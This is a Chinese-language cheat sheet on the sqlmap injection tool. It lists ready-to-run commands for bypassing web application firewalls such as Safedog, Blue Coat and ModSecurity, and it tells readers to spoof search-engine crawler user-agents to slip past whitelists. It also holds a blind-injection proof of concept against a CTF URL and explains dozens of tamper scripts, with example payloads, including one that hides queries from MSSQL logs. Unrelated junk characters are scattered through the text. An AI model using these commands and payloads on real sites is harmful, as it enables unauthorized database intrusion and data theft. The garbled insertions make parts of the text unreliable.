常用語句

• safedog檢測(--tamper "safedog2.py")
  py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch -r

• safedog全面檢測 加參數(shù)：--level 5 --risk 3
  py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --level 5 --risk 3 -r

• safedog全面檢測+延時 加參數(shù)：
  --delay 2 延時
  --timeout=60 等待連接超時的時間 默認(rèn)為30秒
  --time-sec=60 響應(yīng)的延遲時間 默認(rèn)為5秒
  py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --delay 2 --time-sec=60 --timeout=60 --time-sec 60 --level 5 --risk 3 -r

• tor
  python sqlmap.py -u http://xx.cn/ --check-tor --tor

針對于mysql的常用語句

• 快速檢測 --tamper "bluecoat.py"
  py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch -r

• 延時+超時
  py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch --delay 2 --timeout=11 -r

• 全面sql檢測(快速檢測 再加--level 5 --risk 3 )bluecoat.py
  py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch --level 5 --risk 3 -r

加快速度 指定數(shù)據(jù)庫類型：

--dbms Oracle
--dbms Mysql
--dbms "Microsoft Access"

自練注入

• DVWA練習(xí)系統(tǒng)

• (mysql+php環(huán)境) php語句

$sql="SELECT * FROM users WHERE id='$id'LIMIT 0,1"; #只查詢1條記錄

...

過WAF

安全狗 等油啤。

• 清除cookies
  抓包后，cookies沒有用的話清除cookies,保存數(shù)據(jù)包為x.txt
  sqlmap里面用-r x.txt

• --timeout=10 延時

• --ignore-proxy 忽略系統(tǒng)默認(rèn)的HTTP代理

• --delay=2 在每個HTTP請求之間的延遲2秒

• 隨機(jī)user-agent
  加參數(shù) --random-agent

• 指定user-agent
  爬蟲機(jī)器人的user-agent在安全狗里是白名單！

MSN爬蟲
--user-agent "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
雅虎爬蟲
--user-agent "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

其它user-agent：
安卓手機(jī)
user-agent (來自burp自動替換后抓包的UA)
--user-agent "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"

Tamper

空格被過濾萨西？
1.試試%a0 %0b這些常用的字符不行
2.用()取而代之 達(dá)到空格的效果

【華山杯CTF】Web 4.有WAF該怎么注入呢
其他union select都沒過濾承璃，但是union一直不出顯示位，那就只能試試盲注了
id=1e0and(ascii(substr(database(),1,1))>1)

最開始以為不能跨表，就開始爆破字段丑罪，但是爆破了同表只有Name,id兩個字段
既然不是同表的字段传黄，那就只能試試跨表了
構(gòu)造poc如下：
http://218.245.4.113:8080/web04/60c2a013a6decbe0c5c2883080e6b332/index.php?id=1e0and(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))={})'.format(i,d)
這樣查出了數(shù)據(jù)庫名杰扫、表、字段膘掰，最后發(fā)現(xiàn)表和字段都是flag.....

for All databases

base64encode.py apostrophemask.py/apostrophenullencode.py

• Oracle
  greatest.py

• MSSQL

• MySQL
  greatest.py
  【僅針對于mysql】bluecoat.py（equaltolike.py+空格變其他空白符）

• Microsoft SQL Server
  equaltolike.py

• PostgreSQL
  greatest.py

• Microsoft Access

替換空格
space2dash.py

搜索 關(guān)鍵字

所有腳本

apostrophemask.py 替換 單引號' 為 %EF%BC%87 (它的UTF-8全角字符,全寬度對應(yīng)物)


apostrophenullencode.py 替換 單引號' 為 %00%27  (%00%27是 單引號' 的非法 雙字節(jié)unicode字符,double unicode 等價(jià)物)


appendnullbyte.py 在 payload 尾部追加 編碼了的 零字節(jié)字符 即%00   針對[Access]數(shù)據(jù)庫的WAF

base64encode.py 對給定的payload 的所有字符 使用Base64編碼


between.py  用“NOT BETWEEN 0 AND #” 替換大于號>    用“BETWEEN # AND #”替換 等于號=   [mssql oracle mysql postgreSQL]

bluecoat.py 在SQL語句之后用有效的隨機(jī)空白符替換空格符章姓，隨后用“LIKE”替換等于號“=”  [mysql]


charencode.py 對給定payload中的 所有字符 進(jìn)行 1次 url編碼(不處理已經(jīng)編碼過的字符)  [mssql oracle mysql postgreSQL]

chardoubleencode.py 對給定的payload全部字符使用雙重URL編碼（不處理已經(jīng)編碼的字符）

charunicodeencode.py 對給定的payload的 未編碼的字符串 使用Unicode URL編碼（不處理已經(jīng)編碼的字符）  [mssql oracle mysql postgreSQL]

concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替換像“CONCAT(A, B)”的實(shí)例

equaltolike.py 用 運(yùn)算符LIKE 代替 payload中的所有等號符=  此腳本用于bypass 虛弱和定制的(weak and bespoke) WAF(只過濾了 等號 = )


halfversionedmorekeywords.py 在 每個關(guān)鍵字 之前添加mysql版本注釋  即3個字符 /*!     [mysql]繞過WAF

greatest.py  實(shí)質(zhì) 用“GREATEST”函數(shù)替換大于號“>”  繞過WAF對>的攔截


versionedkeywords.py 用MySQL注釋包圍每個非函數(shù)關(guān)鍵字  如/*!UNION*/  [mysql]


ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替換像“IFNULL(A, B)”的實(shí)例

lowercase.py 用小寫值替換每個關(guān)鍵字字符

modsecurityversioned.py 用注釋包圍完整的查詢

modsecurityzeroversioned.py 用當(dāng)中帶有數(shù)字零的注釋包圍完整的查詢

multiplespaces.py 在SQL關(guān)鍵字周圍添加多個空格

nonrecursivereplacement.py 用representations替換預(yù)定義SQL關(guān)鍵字，適用于過濾器

overlongutf8.py 轉(zhuǎn)換給定的payload當(dāng)中的所有字符

percentage.py 在每個字符之前添加一個百分號

randomcase.py 隨機(jī)轉(zhuǎn)換每個關(guān)鍵字字符的大小寫

randomcomments.py 向SQL關(guān)鍵字中插入隨機(jī)注釋

securesphere.py 添加經(jīng)過特殊構(gòu)造的字符串

sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs

space2comment.py 用“/**/”替換空格符

space2dash.py 用破折號注釋符“--”其次是一個隨機(jī)字符串和一個換行符替換空格符

space2hash.py 用磅注釋符“#”其次是一個隨機(jī)字符串和一個換行符替換空格符

space2morehash.py 用磅注釋符“#”其次是一個隨機(jī)字符串和一個換行符替換空格符

space2mssqlblank.py 用一組有效的備選字符集當(dāng)中的隨機(jī)空白符替換空格符

space2mssqlhash.py 用磅注釋符“#”其次是一個換行符替換空格符

space2mysqlblank.py 用一組有效的備選字符集當(dāng)中的隨機(jī)空白符替換空格符

space2mysqldash.py 用破折號注釋符“--”其次是一個換行符替換空格符

space2plus.py 用加號“+”替換空格符

space2randomblank.py 用一組有效的備選字符集當(dāng)中的隨機(jī)空白符替換空格符

unionalltounion.py 用“UNION SELECT”替換“UNION ALL SELECT”

unmagicquotes.py 用一個多字節(jié)組合 %bf%27 和末尾通用注釋一起替換空格符 （寬字符繞過 GPC addslashes）

varnish.py 添加一個HTTP頭“X-originating-IP”來繞過WAF

versionedmorekeywords.py 用MySQL注釋包圍每個關(guān)鍵字

xforwardedfor.py 添加一個偽造的HTTP頭 “X-Forwarded-For”  隨機(jī)IP randomIP()  企圖繞過WAF

添加一個偽造的 HTTP 頭 “X-Forwarded-For” 來繞過 WAF

sqlmap

自動化的SQL注入工具
主要功能是掃描识埋、發(fā)現(xiàn)凡伊、利用某URL的SQL注入漏洞。

sqlmap支持的數(shù)據(jù)庫

MySQL
Oracle
PostgreSQL
Microsoft SQL Server
Microsoft Access
DB2
SQLite
Firebird
Sybase
SAP MaxDB

SQLMAP采用四種獨(dú)特的SQL注入技術(shù)
盲推理SQL注入
UNION查詢SQL注入
堆查詢
基于時間的SQL盲注入

其廣泛的功能和選項(xiàng)包括:
數(shù)據(jù)庫指紋窒舟，枚舉系忙，數(shù)據(jù)庫提取，訪問目標(biāo)文件系統(tǒng)惠豺，并在獲取完全操作權(quán)限時實(shí)行任意命令银还。

通過使用sqlmap中的tamper腳本進(jìn)行更高效的攻擊
下面介紹tamper目錄中的大部分插件

針對WAF - 快速應(yīng)用

1.過濾了等號=

如下數(shù)據(jù)庫可用腳本equaltolike.py
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5

如下數(shù)據(jù)庫可用腳本space2dash.py
MSSQL
SQLite

space2hash.py %23suijizifu%0A

apostrophemask.py

作用： 代替 單引號' 為它的UTF-8全寬度對應(yīng)物%EF%BC%87
(UTF-8 是使用最廣的 一種Unicode的實(shí)現(xiàn)方式！)
Example:
1 AND '1'='1
1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

原文件內(nèi)的說明： (apostrophe character 即 單引號)
Replaces apostrophe character with its UTF-8 full width counterpart

References:
    * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
    * http://lukasz.pilorz.net/testy/unicode_conversion/
    * http://sla.ckers.org/forum/read.php?13,11562,11850
    * http://lukasz.pilorz.net/testy/full_width_utf/index.phps

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

equaltolike.py

作用：用 LIKE 代替 等號= 此腳本用于bypass weak and bespoke定制的 WAF.(只過濾了 等號 = )
Example:

• Input: SELECT * FROM users WHERE id=1
• Output: SELECT * FROM users WHERE id LIKE 1

原文件內(nèi)的說明：
Replaces all occurances of operator equal ('=') with operator 'LIKE'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the equal character ('=')
    * The LIKE operator is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

案例一:http://www.wooyun.org/bugs/wooyun-2010-087296
案例二:http://www.wooyun.org/bugs/wooyun-2010-074790
案例三:http://www.wooyun.org/bugs/wooyun-2010-072489

space2dash.py

作用：繞過過濾等號=
實(shí)質(zhì)是替換空格 為: 注釋符號––再緊跟隨機(jī)字符串 再緊跟一個新行\(zhòng)n
換行(linefeed) 的URL編碼值為 %0A 百度百科:URL編碼

Example:
'1 AND 9227=9227'
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
拆開語句看實(shí)質(zhì)：替換空格 為 --suijizifu%0A
'1--nVNaVoPYeva%0A
AND--ngNvzqu%0A
9227=9227'

原文件內(nèi)的說明：
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')

Requirement:
    * MSSQL
    * SQLite

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ZeroNights SQL injection challenge,
      https://proton.onsec.ru/contest/

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

案例一：http://www.wooyun.org/bugs/wooyun-2010-062878

greatest.py

作用：繞過過濾> 實(shí)質(zhì)用GREATEST替換大于號>
Example:
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

原文件內(nèi)的說明：
Replaces greater than operator ('>') with 'GREATEST' counterpart

Tested against:
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The GREATEST clause is a widespread SQL command. Hence, this
      tamper script should work against majority of databases

>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

space2hash.py

[針對MySQL 4.0, 5.0]
作用：空格 替換為 #符%23 跟隨機(jī)字符串 跟換行符%0A
Example:

• Input: 1 AND 9227=9227
• Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
  拆開語句看實(shí)質(zhì)： 替換空格 為 %23xxxxx%0A
  1
  %23PTTmJopxdWJ%0A
  AND
  %23cWfcVRPV%0A
  9227=9227
  原文件內(nèi)的說明：

Replaces space character (' ') with a pound character ('#') followed by
    a random string and a new line ('\n')

    Requirement:
        * MySQL

    Tested against:
        * MySQL 4.0, 5.0

    Notes:
        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')
    '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

apostrophenullencode.py

作用：繞過 過濾單引號' 替換單引號'為%00%27 (%00%27是 單引號' 的非法 double unicode 等價(jià)物)
Example：
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
拆開語句看實(shí)質(zhì)：
'1 AND
%00%27
1
%00%27
=
%00%27
1'

原文件內(nèi)的說明：
Replaces apostrophe character with its illegal double unicode counterpart

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

halfversionedmorekeywords.py

作用：每個關(guān)鍵字之前添加mysql版本注釋 即3個字符 /*! [mysql]繞過WAF

Example：
"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
拆開語句看實(shí)質(zhì)： 
"value'
/*!0
UNION
/*!0
ALL
/*!0
SELECT
/*!0
CONCAT(
/*!0
CHAR(58,107,112,113,58),
/*!0
IFNULL(CAST(
/*!0
CURRENT_USER()
/*!0
AS
/*!0
CHAR),
/*!0
CHAR(32)),
/*!0
CHAR(58,97,110,121,58)),
/*!0
NULL,
/*!0
NULL#
/*!0
AND 'QDWa'='QDWa"

解釋/!語句/ 來自網(wǎng)絡(luò)
MySQL服務(wù)器包含一些其他SQL DBMS中不具備的擴(kuò)展洁墙。
如果在字符“!”后添加了版本號蛹疯，僅當(dāng)MySQL的版本>=指定的版本號時才會執(zhí)行注釋中的語法：
CREATE /*!32302 TEMPORARY */ TABLE t (c INT);
這句是說，如果你的版本號為3.23.02或更高热监，MySQL服務(wù)器將使用TEMPORARY關(guān)鍵字捺弦。

原文件內(nèi)的說明：
Adds versioned MySQL comment before each keyword

Requirement:
    * MySQL < 5.1

Tested against:
    * MySQL 4.0.18, 5.0.22

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

space2morehash.py

作用：空格替換為: #號跟隨機(jī)字符串再跟換行符%0A
Example：

• Input: 1 AND 9227=9227
• Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
  拆開語句看實(shí)質(zhì)：
  1
  %23PTTmJopxdWJ%0A
  AND
  %23cWfcVRPV%0A
  9227=9227

原文件內(nèi)的說明：
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.41

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

appendnullbyte.py

作用：在 payload 尾部追加 編碼了的 零字節(jié)字符 即%00 對Access數(shù)據(jù)庫的WAF±俏常可能有效
Example：
'1 AND 1=1'
'1 AND 1=1%00'

Sql 語句中的注釋符：
Access 中沒有專門的注釋符號(/*/ -- #都沒法使用),但可用空字符NULL (URL編碼為%00)
如' UNION SELECT Count() FROM admin%00

原文件內(nèi)的說明：
Appends encoded NULL byte character at the end of payload

Requirement:
    * Microsoft Access

Notes:
    * Useful to bypass weak web application firewalls when the back-end
      database management system is Microsoft Access - further uses are
      also possible

Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

ifnull2ifisnull.py

作用：繞過對 IFNULL 過濾羹呵。替換IFNULL(A, B)為IF(ISNULL(A), B, A)
Example：
'IFNULL(1, 2)'
'IF(ISNULL(1),2,1)'

原文件內(nèi)的說明：
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

Requirement:
    * MySQL
    * SQLite (possibly)
    * SAP MaxDB (possibly)

Tested against:
    * MySQL 5.0 and 5.5

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that filter the IFNULL() function

>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

space2mssqlblank.py(mssql)

作用：空格替換為隨機(jī)空符號（從一個有效的 可替換的空字符 組成的集合）

Example：
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'

案例一:
http://www.wooyun.org/bugs/wooyun-2010-062878

原文件內(nèi)的說明：
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * Microsoft SQL Server

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'
"""

# ASCII table:
#   SOH     01      start of heading
#   STX     02      start of text
#   ETX     03      end of text
#   EOT     04      end of transmission
#   ENQ     05      enquiry
#   ACK     06      acknowledge
#   BEL     07      bell
#   BS      08      backspace
#   TAB     09      horizontal tab
#   LF      0A      new line
#   VT      0B      vertical TAB
#   FF      0C      new page
#   CR      0D      carriage return
#   SO      0E      shift out
#   SI      0F      shift in

base64encode.py

作用：用base64編碼替換payload字符 Base64 all characters in a given payload

Example: ("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

Requirement: all

案例一:
http://www.wooyun.org/bugs/wooyun-2010-060071
案例
二:http://www.wooyun.org/bugs/wooyun-2010-021062
案例
三:http://www.wooyun.org/bugs/wooyun-2010-043229

space2mssqlhash.py

作用：替換空格 為 #號跟換行\(zhòng)n
實(shí)質(zhì)把 %20 替換為%23%0A

Example:
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

原文件內(nèi)的說明：
"""
Replaces space character (' ') with a pound character ('#') followed by
a new line ('\n')

Requirement:
    * MSSQL
    * MySQL

Notes:
    * Useful to bypass several web application firewalls

>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""

modsecurityversioned.py

作用：（用MySQL版本注釋）包含 完整的查詢

針對 空格 被過濾

Example:
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'

原文件內(nèi)的說明：

"""
    Embraces complete query with versioned comment

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass ModSecurity WAF/IDS

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'
"""

space2mysqlblank.py

作用：空格替換為隨機(jī)空符號（從一個有效的 可替換的空字符 組成的集合）
12345

Example:

• Input: SELECTid FROMusers
• Output: SELECT%0Bid%0BFROM%A0users

案例一:
http://www.wooyun.org/bugs/wooyun-2010-076735

原文件內(nèi)的說明：
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * MySQL

Tested against:
    * MySQL 5.1

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Bid%0DFROM%0Cusers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return
#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)

between.py

作用：用between替換> < = NOT BETWEEN 0 AND 2 替換掉 > 2

Example:
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'

案例一:
http://www.wooyun.org/bugs/wooyun-2010-068815

原文件內(nèi)的說明：
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The BETWEEN clause is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
"""

space2mysqldash.py 注：之前有個mssql的 這個是mysql的

作用：替換空格為 一個破折號注釋--再跟一個新行\(zhòng)n
實(shí)質(zhì)：空格 變?yōu)?-\n
Example:
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

原文件內(nèi)的說明：
"""
Replaces space character (' ') with a dash comment ('--') followed by
a new line ('\n')

Requirement:
    * MySQL
    * MSSQL

Tested against:

Notes:
    * Useful to bypass several web application firewalls.

>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""

multiplespaces.py

作用：圍繞SQL關(guān)鍵字 添加多個空格
實(shí)質(zhì)：一個空格 變?yōu)?多個空格
Example:
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'

案例一:
http://www.wooyun.org/bugs/wooyun-2010-072489

原文件內(nèi)的說明：
"""
Adds multiple spaces around SQL keywords

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions

Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

"""

space2plus.py

作用：替換空格為+號
1 Example: ('SELECT id FROM users')
'SELECT+id+FROM+users'

原文件內(nèi)的說明：
"""
Replaces space character (' ') with plus ('+')

Notes:
    * Is this any useful? The plus get's url-encoded by sqlmap engine
      invalidating the query afterwards
    * This tamper script works against all databases

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""

bluecoat.py

作用：代替SQL statement后面的空格符 為 一個有效的隨機(jī)空白字符。 然后替換=為like

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

原文件內(nèi)的說明：

"""
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator

Requirement:
    * Blue Coat SGOS with WAF activated as documented in
    https://kb.bluecoat.com/index?page=content&id=FAQ2147

Tested against:
    * MySQL 5.1, SGOS

Notes:
    * Useful to bypass Blue Coat's recommended WAF rule configuration

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""

nonrecursivereplacement.py

作用：雙重查詢語句
針對于 非遞歸替換(只是一次簡單替換sql關(guān)鍵字 的網(wǎng)站程序).
這種程序只會1次替換 如 "SELECT" 為 ""

原文件內(nèi)的說明：
"""
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters

Notes:
    * Useful to bypass very weak custom filters

>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""

space2randomblank.py

作用：替換 空格字符 為一個隨機(jī)空白符（從一個有效的 可替換的空字符 組成的集合）

>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'

原文件內(nèi)的說明：
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return

sp_password.py

作用：有效載荷的末尾 追加sp_password (for自動模糊處理 from DBMS logs) 從T-SQL記錄 隱藏它疗琉。

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""

原文件內(nèi)的說明：
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

Requirement:
    * MSSQL

Notes:
    * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
    * Reference: http://websec.ca/kb/sql_injection

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""

chardoubleencode.py

作用：2次 url編碼 所有字符冈欢。(不處理已經(jīng)編碼處理過的)

例：如字符A 進(jìn)行1次url編碼 為%41 然后再對百分號再進(jìn)行url編碼（對4和1不編碼）得到%2541
%經(jīng)過1次url編碼 為%25

例（實(shí)質(zhì)過程）：本腳本不會對%20進(jìn)行任何編碼！
原始語句：SELECT FIELD FROM%20TABLE
先還原為：SELECT FIELD FROM TABLE
經(jīng)過1次url編碼后盈简，再把百分號%全部替換為%25

實(shí)例:
SELECT FIELD FROM%20TABLE(這個%20按正常url編碼就會被編碼為%25%32%30實(shí)際上本腳本不對編碼過的再編碼)
1次url編碼（字符串%20不變）：%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
把所有百分號替換為%25得到處理結(jié)果：%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

原文件內(nèi)的說明：
"""
Double url-encodes all characters in a given payload (not processing
already encoded)

Notes:
    * Useful to bypass some weak web application firewalls that do not
      double url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""

unionalltounion.py

作用：替換UNION ALL 為 UNION

原文件內(nèi)的說明：
"""
Replaces UNION ALL SELECT with UNION SELECT

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""

charencode.py

作用：對載荷中所有字符進(jìn)行 1次 url編碼(不處理已經(jīng)編碼過的)
Example：
'SELECT FIELD FROM%20TABLE'
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

原文件內(nèi)的說明：

"""
Url-encodes all characters in a given payload (not processing already
encoded)

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak web application firewalls that do not
      url-decode the request before processing it through their ruleset
    * The web server will anyway pass the url-decoded version behind,
      hence it should work against any DBMS

>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""

randomcase.py

作用：替換 每個 (易被攔截的)關(guān)鍵字 的字母為隨機(jī)大小寫

原文件內(nèi)的說明：

"""
Replaces each keyword character with random case value

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions
    * This tamper script should work against all (?) databases

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""

unmagicquotes.py

反 魔術(shù)引號[寬字符繞過 GPC addslashes]
作用：替換單引號'為%bf%27 并在語句尾部加入一般注釋-- 以保證語句運(yùn)行.
原文件內(nèi)的說明：

"""
Replaces quote character (') with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)

Notes:
    * Useful for bypassing magic_quotes/addslashes feature

Reference:
    * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

>>> tamper("1' AND 1=1")
'1%bf%27-- '
"""

randomcomments.py

作用：sql關(guān)鍵字(中的字母之間) 隨機(jī)加/**/

原文件內(nèi)的說明：
"""
Add random comments to SQL keywords

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""

charunicodeencode.py

作用：字符串 unicode 編碼

案例一:
http://www.wooyun.org/bugs/wooyun-2010-074261

原文件內(nèi)的說明：
"""
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)

Requirement:
    * ASP
    * ASP.NET

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005
    * MySQL 5.1.56
    * PostgreSQL 9.0.3

Notes:
    * Useful to bypass weak web application firewalls that do not
      unicode url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""

securesphere.py

作用：追加特制的字符串

原文件內(nèi)的說明：
"""
Appends special crafted string

Notes:
    * Useful for bypassing Imperva SecureSphere WAF
    * Reference: http://seclists.org/fulldisclosure/2011/May/163

>>> tamper('1 AND 1=1')
